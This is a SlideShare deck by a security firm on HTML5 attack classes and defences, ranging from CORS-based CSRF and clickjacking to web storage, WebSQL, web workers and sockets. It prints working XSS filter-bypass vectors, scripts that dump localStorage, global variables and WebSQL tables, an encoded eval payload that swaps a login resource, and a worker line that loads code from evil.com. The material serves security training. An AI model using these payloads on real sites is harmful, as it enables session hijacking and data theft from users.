SlideShare a Scribd company logo

HTML5 hacking

B
Blueinfy Solutions

This preso covers HTML5 hacking and security in detail

Technology
1 of 84
HTML5 Hacking
API (Media, Geo etc.) & Messaging Plug-In Modern Browser Model HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
HTML5 – App Layers • Presentation – HTML5 (Tags & Events – new model) • Process & Logic – JavaScript, Document Object Model (DOM - 3), Events, Parsers/Threads etc. • Network & Access – XHR – Level 2 – WebSockets – Plugin-Sockets • Core Policies – SOP – Sandboxing for iframe – CORS
• CORS/SOP – Data transfer & Origin issues • Web Messaging – Cross Domain calls • Web Workers – Domain calls & Logic issues • LocalStorage – Information leakage & Identity • Web SQL – Offline & Data theft • UI/HTML5 – UI Redressing (mixed with CORS) • DOM/XHR – Several issues • APIs - Geo-Location, Sockets, Drag-Drop Abuse Threat Model & HTML5 Components
Attacks - Stealth and Silent … A1 - CORS Attacks & CSRF A2 - ClickJacking, CORJacking and UI exploits A3 - XSS with HTML5 tags, attributes and events A4 - Web Storage and DOM information extraction A5 - SQLi & Blind Enumeration A6 - Web Messaging and Web Workers injections A7 - DOM based XSS with HTML5 & Messaging A8 - Third party/Offline HTML Widgets and Gadgets A9 - Web Sockets and Attacks A10 - Protocol/Schema/APIs attacks with HTML5 5
API (Media, Geo etc.) & Messaging Plug-In A1 - CORS Attacks & CSRF HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
HTML5, CORS & XHR • Before HTML5 – XHR was possible to same origin only (SOP applicable) • HTML5 – allows cross origin calls with XHR- Level 2 calls • CORS – Cross Origin Resource Sharing needs to be followed (Option/Preflight calls) • Adding extra HTTP header (Access-Control- Allow-Origin and few others) 7
HTTP Headers • Request Origin Access-Control-Request-Method (preflight) Access-Control-Request-Headers (preflight) • Response Access-Control-Allow-Origin Access-Control-Allow-Credentials Access-Control-Allow-Expose-Headers Access-Control-Allow-Max-Age (preflight) Access-Control-Allow-Allow-Methods (preflight) Access-Control-Allow-Allow-Headers (preflight) 8
• CSRF++ - powered by XHR-L2 • XML/JSON Cross Domain stream injection • CORS preflight bypass – content-type • Internal network scanning and tunneling • Information harvesting (internal crawling) • Stealth browser shell – post XSS (Allow origin- *) • Forcing cookie replay by “withCredentials” • Business functionality abuse (upload and streams) Stealth threats
CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server Login request (HTTPS) Session cookie Client/Victim Browser User establishing Session
CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server Placing an order (JSON services) Success Client/Victim Browser User making a buy over HTTP Browser using XHR Call JavaScript
CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server Client/Victim Browser Session is still live – not yet logged out Attacker’s Site Visit Attacker’s page Attacker sends CSRF payload Leveraging XHR Call • Content-type to avoid pre flight • “withCredentials” set to true
CSRF & HTML5 13
CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server XHR initiates HTTP buy request Success – cookie replayed Client/Victim Browser Attacker’s Site Visit Attacker’s page Attacker sends CSRF payload Hence, • Without victim’s consent or notice • Stealth HTTP request generated • Silent Exploitation takes place Got it
CSRF & HTML5 15
• Powerful XHR-Level 2 call allows file upload on the fly. • Interestingly – possible to craft file through JavaScript and post on the server – if CSRF token is not there. • Example, your profile is having a photograph of yours and you visit attacker site that photo changes to something else • More serious threat, exploiting actual business functionalities... CSRF/Upload
CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server Uploading bulk orders Success Client/Victim Browser Business layer function of uploading Browser is having Form (multi-part)
CSRF/Upload - POC
CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server XHR initiates HTTP multi-part - Upload Success – cookie replayed Client/Victim Browser Attacker’s Site Visit Attacker’s page Attacker sends CSRF payload Hence, • Without victim’s consent or notice • Stealth HTTP Upload takes place • Silent Exploitation… Got it
CSRF/Upload
Internal Scan/Crawl for CORS • XHR2 – allows full internal scanning capacity • If internal resource is set to “*” for Access-Control- Allow-Origin – Game Over!!! • Attacker can craft a page for box behind firewall, visit the page – XHR gets loaded and start crawling internal information with back tunnel • Harvest and POST back to the server • All JavaScript – supported by all HTML5 browsers • Also can be mixed with timing attacks • Limited crawl – “withCredentials” will not work … 21
Internal Scan/Crawl for CORS Internal Web/App Server Internal Web Mail Internal HR Application Client/Victim Browser Attacker’s Site InternetInternet IntranetIntranet CSRF Payload And stealth channel
Internal Scan for CORS
• Scan and look for – Content-Type checking on server side – CORS policy scan – Form and Upload with tokens or not • Defense and Countermeasures – Secure libraries for streaming HTML5/Web 2.0 content – CSRF protections – Stronger CORS implementation Scan and Defend
API (Media, Geo etc.) & Messaging Plug-In A2 - ClickJacking, CORJacking and UI exploits HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
Click/COR-Jacking • UI Redressing (Click/Tab/Event Jacking) attack vectors are popular ways to abuse cross domain HTTP calls and events. • HTML5 and RIA applications are having various different resources like Flash files, Silverlight, video, audio etc. • If DOM is forced to change underlying resource on the fly and replaced by cross origin/domain resource then it causes Cross Origin Resource Jacking (CROJacking). 26
• Iframe is having new attributed called sandbox • It allows frame isolation • Diabling JavaScript on cross domain while loading – bypassing frame bursting script – <iframe src="http://192.168.100.21/" sandbox="allow-same-origin allow-scripts" height=“x" width=“x"> - Script will run… – <iframe src="http://192.168.100.21/" sandbox="allow-same-origin" height="500" width="500"> - script will not run – ClickJacking Sandbox – HTML5
CORJacking • It is possible to have some integrated attacks – DOM based XSS – CSRF – Flash • DOM based issue can change flash/swf file – it can be changed at run time – user will not come to know .. • Example – document.getElementsByName(“login").item(0).src = "http://evil/login.swf"
CORJacking • Possible with other types of resources as well • Also, reverse CORJacking is a possible threat 29
Double eval – eval the eval • Payload - document.getElementsByName('Login').ite m(0).src='http://192.168.100.200:8080/flex/ Loginn/Loginn.swf‘ • Converting for double eval to inject ‘ and “ etc… – eval(String.fromCharCode(100,111,99,117,109,101,110,116, 46,103,101,116,69,108,101,109,101,110,116,115,66,121,78, 97,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101, 109,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47 ,49,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,4 8,47,102,108,101,120,47,76,111,103,105,110,110,47,76,111, 103,105,110,110,46,115,119,102,39))
Similar with … • It is possible to have some integrated attacks – DOM based XSS – CSRF – Silvelight files • DOM based issue can change xap file – it can be changed at run time – user will not come to know .. • Example – document.getElementsByName(“login").item(0).src = "http://evil/login.xap"
• Scan and look for – ClickJacking defense code scanning – Using X-FRAME-OPTIONS • Defense and Countermeasures – Better control on CORS – Creating self aware components and loading after checking the domain Scan and Defend
API (Media, Geo etc.) & Messaging Plug-In A3 - XSS with HTML5 tags, attributes and events HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
HTML5 – Tags/Attributes/Events • Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys) • Attributes – form, submit, autofocus, sandbox, manifest, rel etc. • Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. 34
HTML5 – XSS • Blacklist and filter will get bypassed • Lot of new signatures and possible ways to execute scripts • XSS can be injected from tags and events • New attributes are available for XSS payload 35
XSS variants • Media tags • Examples – <video><source onerror="javascript:alert(1)“> – <video onerror="javascript:alert(1)"><source> 36
XSS variants • Exploiting autofocus – <input autofocus onfocus=alert(1)> – <select autofocus onfocus=alert(1)> – <textarea autofocus onfocus=alert(1)> – <keygen autofocus onfocus=alert(1)> 37
XSS variants • MathML issues – <math href="javascript:alert(1)">CLICKME</math> – <math> <maction actiontype="statusline#http://Blueinfy.com" xlink:href="javascript:alert(1)">CLICKME</ma ction> </math> 38
XSS variants • Form & Button etc. – <form id="test" /><button form="test" formaction="javascript:alert(1)">test – <form><button formaction="javascript:alert(1)">test • Etc … and more … 39
• Scan and look for – Reflected or Persistent XSS spots with HTML5 tags • Defense and Countermeasures – Have it added on your blacklist – Standard XSS protections by encoding Scan and Defend
API (Media, Geo etc.) & Messaging Plug-In A4 - Web Storage and DOM information extraction HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
Web Storage Extraction • Browser has one place to store data – Cookie (limited and replayed) • HTML5 – Storage API provided (Local and Session) • Can hold global scoped variables • http://www.w3.org/TR/webstorage/ 42
Web Storage Extraction • It is possible to steal them through XSS or via JavaScript • Session hijacking – HttpOnly of no use • getItem and setItem calls • XSS the box and scan through storage
Blind storage enumeration if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); } } • Above code allows all storage variable extraction 44
DOM Storage • Applications run with “rich” DOM • JavaScript sets several variables and parameters while loading – GLOBALS • It has sensitive information and what if they are GLOBAL and remains during the life of application • It can be retrieved with XSS • HTTP request and response are going through JavaScripts (XHR) – what about those vars?
Password extraction from Ajax/DOM/HTML5 routine • Here is the line of code – temp = "login.do?user="+user+"&pwd="+pwd; xmlhttp.open("GET",temp,true); xmlhttp.onreadystatechange=function()
Blind Enumeration for(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){} } 47
Global Sensitive Information Extraction from DOM • HTML5 apps running on Single DOM • Having several key global variables, objects and array – var arrayGlobals = ['my@email.com',"12141hewvsdr9321343423 mjfdvint","test.com"]; • Post DOM based exploitation possible and harvesting all these values. 48
Global Sensitive Information Extraction from DOM for(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} } } 49
• Scan and look for – Scanning storage • Defense and Countermeasures – Do not store sensitive information on localStorage and Globals – XSS protection Scan and Defend
API (Media, Geo etc.) & Messaging Plug-In A5 - SQLi & Blind Enumeration HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
SQL Injection • WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. • Allows one time data loading and offline browsing capabilities. • Causes security concern and potential injection points. • Methods and calls are possible
SQL Injection • Through JavaScript one can harvest entire local database. • Example
Blind WebSQL Enumeration • We need following to exploit – Database object – Table structure created on SQLite – User table on which we need to run select query 54
Blind WebSQL Enumeration var dbo; var table; var usertable; for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'', [],function(tx,results){ table=results; },null); }); } }catch(ex){} } if(table.rows.length>1) usertable=table.rows.item(1).name; 55
Blind WebSQL Enumeration • We will run through all objects and get object where constructor is “Database” • We will make Select query directly to sqlite_master database • We will grab 1st table leaving webkit table on 0th entry 56
Blind WebSQL Enumeration 57
API (Media, Geo etc.) & Messaging Plug-In A6 - Web Messaging and Web Workers injections HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
Web Messaging • HTML5 is having new interframe communication system called Web Messaging. • By postMessage() call parent frame/domain can call with the iframe • Iframe can be loaded on cross domain. Hence, create issues – data/information validation & data leakage by cross posting possible 59
Web Messaging - Scenario • If postMessage() is set to * so page can be loaded in iframe and messaging can be hijacked • Also, origin is not set to fixed then again frame listen from any domian – again an issue • Stream coming needs to be checked before innerHTML or eval() • Iframe or Web Worker can glue two streams – same domain or cross domain 60
Web Worker – Hacks! • Web Workers allows threading into HTML pages using JavaScript • No need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlers • Totally Async and well supported [initialize] var worker = new Worker('task.js'); [Messaging] worker.postMessage(); 61
Web Worker – Hacks! 62 JavaScript Runtime Browser Platform Scope and Object – No DOM Access XHR, Location, Navigator etc. Regex, Array, JSON etc… Web Page Current DOM Background Thread on same page - messaging Web Worker
Web Worker – Hacks! • Security issues – It is not allowing to load cross domain worker scripts. (http:, https:,javascript:,data : -No) – It has some typical issues • It allows the use of XHR. Hence, in-domain and CORS requests possible • It can cause DoS – if user get stream to run JavaScript in worker thread. Don’t have access to parent DOM though • Message validation needed – else DOM based XSS 63
Web Worker – Hacks! • Exmaple <html> <button onclick="Read()">Read Last Message</button> <button onclick="stop()">Stop</button> <output id="result"></output> <script> function Read() { worker.postMessage({'cmd': 'read', 'msg': 'last'}); } function stop() { worker.postMessage({'cmd': 'stop', 'msg': 'stop it'}); alert("Worker stopped"); } var worker = new Worker('message.js'); worker.addEventListener('message', function(e) { document.getElementById('result').innerHTML = e.data; }, false); </script> </html> 64
Web Workers – Hacks! • Possible to cause XSS – Running script – Passing hidden payload • Also, web workers can help in embedding silent running js file and can be controlled. • Can be a tool for payload delivery and control within browser framework • importScripts("http://evil.com/payload.js") – worker can run cross domain script 65
Web Worker – Hacks! 66
• Scan and look for – JavaScript scanning – Messaging and Worker implementation • Defense and Countermeasures – Same origin listening is a must for messaging event Scan and Defend
API (Media, Geo etc.) & Messaging Plug-In A7 - DOM based XSS with HTML5 & Messaging HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
DOM with HTML5
DOM based XSS - Messaging • It is a sleeping giant in the Ajax applications coupled with Web Messaging • Root cause – DOM is already loaded – Application is single page and DOM remains same – New information coming needs to be injected in using various DOM calls like eval() – Information is coming from untrusted sources – JSONP usage – Web Workers and callbacks
AJAX with HTML5 – DOM • Ajax function would be making a back-end call • Back-end would be returning JSON stream or any other and get injected in DOM • In some libraries their content type would allow them to get loaded in browser directly • In that case bypassing DOM processing…
• Scan and look for – DOM calls – Use of eval(), document.* calls etc. • Defense and Countermeasures – Secure JavaScript coding Scan and Defend
API (Media, Geo etc.) & Messaging Plug-In A8 - Third party/Offline HTML Widgets and Gadgets HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
Offline Apps • HTML5 supports caching pages for offline usage • <html manifest="/appcache.manifest"> • List of pages gets stored • Possible to attack and cache poisoning – Untrusted network or proxy can inject malicious script – When you get on to actual app that script gets executed and keep eye on your activities 74
HTML5 Widgets • Widgets/Gadgets/Modules – popular with HTML5 applications • Small programs runs under browser and using Web Workers and Messaging • JavaScript and HTML based components • In some cases they share same DOM – Yes, same DOM • It can cause a cross widget channels and iframe/sandbox
Cross DOM Access Widget 1 Email Widget DOM – Shared DOM Widget 2 RSS Feed Reader Widget 3 Attacker Setting the trap HTML5 – Web Messaging and Workers
HTML5 - Traps • It is possible to access DOM events, variables, logic etc. • Sandbox is required at the architecture layer to protect cross widget access • Segregating DOM by iframe may help • Flash based widget is having its own issues as well • Code analysis of widgets before allowing them to load
API (Media, Geo etc.) & Messaging Plug-In A9 - Web Sockets and Attacks HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
Web Sockets • HTML5 allows Web Socket APIs – full duplex TCP channel through JavaScript • Allows cross domain connection like CORS • Possible threats – Back door and browser shell – Quick port scanning – Botnet and malware can leverage (one to many connections) – Sniffer based on Web Socket 79
Internal Scanning • Allows internal scanning, setting backward hidden channel, opening calls to proxy/cache. • Some browsers have blocked these calls for security reason.
API (Media, Geo etc.) & Messaging Plug-In A10 - Protocol/Schema/APIs attacks with HTML5 HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
Custom protocol/schema • HTML5 allows custom protocol and schema registration • Example – navigator.registerProtocolHandler("mailto", "http://www.foo.com/?uri=%s", “My Mail"); • It is possible to abuse this feature in certain cases • Browser follows and gets registered for same domain though 82
• HTML5 few other APIs are interesting from security standpoint – File APIs – allows local file access and can mixed with ClickJacking and other attacks to gain client files. – Drag-Drop APIs – exploiting self XSS and few other tricks, hijacking cookies … – Lot more to explore and defend… APIs …
Conclusion

Recommended

XPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionXPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal Injection
Blueinfy Solutions
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
Shreeraj Shah
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
DefconRussia
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
chuckbt
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumeration
Blueinfy Solutions
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SAST
Blueinfy Solutions
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approach
Blueinfy Solutions
 

Recommended

XPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionXPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal Injection
Blueinfy Solutions
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
Shreeraj Shah
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
DefconRussia
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
chuckbt
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumeration
Blueinfy Solutions
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SAST
Blueinfy Solutions
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approach
Blueinfy Solutions
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
Shreeraj Shah
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Shreeraj Shah
 
Html5 on mobile
Html5 on mobileHtml5 on mobile
Html5 on mobile
Blueinfy Solutions
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
Shreeraj Shah
 
Web Services Hacking and Security
Web Services Hacking and SecurityWeb Services Hacking and Security
Web Services Hacking and Security
Blueinfy Solutions
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
Shreeraj Shah
 
D@W REST security
D@W REST securityD@W REST security
D@W REST security
Gaurav Sharma
 
Application fuzzing
Application fuzzingApplication fuzzing
Application fuzzing
Blueinfy Solutions
 
Mobile security chess board - attacks & defense
Mobile security chess board - attacks & defenseMobile security chess board - attacks & defense
Mobile security chess board - attacks & defense
Blueinfy Solutions
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
Aryashree Pritikrishna
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
Michael Hendrickx
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
ZIONSECURITY
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
Shreeraj Shah
 
Secure java script-for-developers
Secure java script-for-developersSecure java script-for-developers
Secure java script-for-developers
n|u - The Open Security Community
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
Ahmed Sherif
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
Web application attack Presentation
Web application attack PresentationWeb application attack Presentation
Web application attack Presentation
Khoa Nguyen
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
Shreeraj Shah
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
hruth
 
OWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacksOWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacks
Mohamed Talaat
 
Html5 security
Html5 securityHtml5 security
Html5 security
Krishna T
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
Conviso Application Security
 

More Related Content

What's hot

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
Shreeraj Shah
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Shreeraj Shah
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
Shreeraj Shah
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
Shreeraj Shah
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
Shreeraj Shah
 

What's hot (20)

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
Html5 on mobile
Html5 on mobileHtml5 on mobile
Html5 on mobile
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 
Web Services Hacking and Security
Web Services Hacking and SecurityWeb Services Hacking and Security
Web Services Hacking and Security
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
 
D@W REST security
D@W REST securityD@W REST security
D@W REST security
 
Application fuzzing
Application fuzzingApplication fuzzing
Application fuzzing
 
Mobile security chess board - attacks & defense
Mobile security chess board - attacks & defenseMobile security chess board - attacks & defense
Mobile security chess board - attacks & defense
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Secure java script-for-developers
Secure java script-for-developersSecure java script-for-developers
Secure java script-for-developers
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Web application attack Presentation
Web application attack PresentationWeb application attack Presentation
Web application attack Presentation
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
OWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacksOWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacks
 

Similar to HTML5 hacking

Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
Conviso Application Security
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
Krzysztof Kotowicz
 
Pentesting web applications
Pentesting web applicationsPentesting web applications
Pentesting web applications
Satish b
 
ColdFusion_Code_Security_Best_Practices_NCDevCon_2015
ColdFusion_Code_Security_Best_Practices_NCDevCon_2015ColdFusion_Code_Security_Best_Practices_NCDevCon_2015
ColdFusion_Code_Security_Best_Practices_NCDevCon_2015
Denard Springle IV
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
Positive Hack Days
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
beched
 

Similar to HTML5 hacking (20)

Html5 security
Html5 securityHtml5 security
Html5 security
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Browser Security
Browser SecurityBrowser Security
Browser Security
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
Cos 432 web_security
Cos 432 web_securityCos 432 web_security
Cos 432 web_security
 
2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain
 
Pentesting web applications
Pentesting web applicationsPentesting web applications
Pentesting web applications
 
ColdFusion_Code_Security_Best_Practices_NCDevCon_2015
ColdFusion_Code_Security_Best_Practices_NCDevCon_2015ColdFusion_Code_Security_Best_Practices_NCDevCon_2015
ColdFusion_Code_Security_Best_Practices_NCDevCon_2015
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
 
Burp suite
Burp suiteBurp suite
Burp suite
 
Vulnerabilities on Various Data Processing Levels
